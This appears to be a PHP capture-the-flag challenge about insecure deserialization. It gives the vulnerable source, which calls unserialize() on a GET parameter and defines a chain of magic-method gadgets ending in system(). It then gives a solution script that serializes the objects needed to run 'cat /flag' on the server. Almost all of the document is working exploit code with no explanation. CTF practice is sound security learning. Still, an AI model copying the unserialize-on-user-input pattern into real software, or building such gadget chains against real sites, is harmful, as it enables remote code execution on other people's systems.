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| <?php highlight_file(__file__); Class Rd{ public $ending; public $cl;
public $poc; public function __destruct() { echo "All matters have concluded"; die($this->ending); } public function __call($name, $arg) { foreach ($arg as $key =>$value) {
if($arg[0]['POC']=="1111") { echo "1"; $this->cl->var1 = "system"; } } } }
class Poc{ public $payload;
public $fun;
public function __set($name, $value) { $this->payload = $name; $this->fun = $value; }
function getflag($paylaod) { echo "Have you genuinely accomplished what you set out to do?"; file_get_contents($paylaod); } }
class Er{ public $symbol; public $Flag;
public function __construct() { $this->symbol = True; }
public function __set($name, $value) { $value($this->Flag); }
class Ha{ public $start; public $start1; public $start2; public function __construct() { echo $this->start1."__construct"."</br>"; }
public function __destruct() { if($this->start2==="11111") { $this->start1->Love($this->start); echo "You are Good!"; } } }
if(isset($_GET['Ha_rde_r'])) { unserialize($_GET['Ha_rde_r']); } else{ die("You are Silly goose!"); } ?>
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| <?php Class Rd{ public $ending; public $cl; public $poc; } class Er{ public $symbol; public $Flag = "cat /flag"; } class Ha{ public $start = array("POC"=>"1111"); public $start1; public $start2="11111"; } $a = new Ha(); $b = new Er(); $c = new Rd(); $a->start1 = $c; $a->start1->cl = $b; echo serialize($a); ?>